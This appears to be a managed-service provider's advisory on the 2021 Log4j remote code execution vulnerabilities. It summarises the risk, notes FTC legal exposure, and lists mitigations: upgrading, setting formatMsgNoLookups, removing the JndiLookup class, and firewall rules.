On December 9, 2021, Apache (Log4j) disclosed (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) the Log4j logging library contains a remote code execution vulnerability. They assigned this with a severity level of 10 (the highest possible risk score). The Log4j is a ubiquitous piece of software used to record activities in a wide range of systems found in consumer-facing products and services. This vulnerability poses severe risk to millions of consumer products to enterprise software and web applications.
Example representation of Exfiltration Attack Scenario:
Exploitation attempts and testing have remained high during the last weeks of December and show no signs of slowing down. Security companies have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. It is recommended customers do additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance.
When vulnerabilities are discovered and exploited, it risks a loss or breach of personal information, financial loss, and other irreversible harms. The duty to take reasonable steps to mitigate known software vulnerabilities implicates laws including, among others, the Federal Trade Commission Act and the Gramm Leach Bliley Act. It is critical that companies and their vendors relying on Log4j act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action.
What to do next?
Many software vendors have published patches or version upgrades to specifically address the affected software/vulnerability. Even if the affected software does not have a remediation released yet, there are other ways to manually prevent the vulnerability from being exploited.
Here are some actions you can take:
Upgrade – Version 2.15.0 of Log4j was recently released in response to the vulnerability and contains a fix, so the best course of action would be to upgrade vulnerable devices to version 2.15.0 immediately. If vendors have mitigations measures ready, work together to ensure you are taking a coordinated approach to incident response.
If you are unable to patch, there are manual ways you can protect your environment:
Change parameters – If your version is 2.10 or above, you can add Java parameter –Dlog4j2.formatMsgNoLookups=true, which changes the system property log4j2.formatMsgNoLookups to true.
If you are running an older version, from 2.0-beta9 to 2.10.0, then the immediate fix is to remove JndiLookup class from the classpath.
Note, these manual solutions could have dependencies from the software applications that utilize Log4j logging application. The best solution is to work with your vendor for a certified patch.
Firewall – Another way to reduce your exposure is to update your next-gen firewall, web application firewall (WAF), and web proxy rules in order to block potentially dangerous requests. Unfortunately, there are no ways to obfuscate the appropriate strings; therefore, there’s no 100% foolproof way to detect attacks. The other options are more guaranteed to block the vulnerability so be aware that any filter you put in place could potentially be bypassed. Check with your firewall vendor for latest rule sets.
In conclusion, to ensure your data and systems are protected, check with your vendors to ensure this vulnerability doesn’t exist within your environment or the applications you use. If found, take immediate actions to patch vulnerable systems identified. Vulnerabilities will constantly be identified and exposed, ensure you have proactive measures in place and ‘layers’ of security to protect your critical business systems and especially your customer data.
If you are a PCS Managed Service customer, proactive scanning of your network systems are being performed to identify any instances of this vulnerability.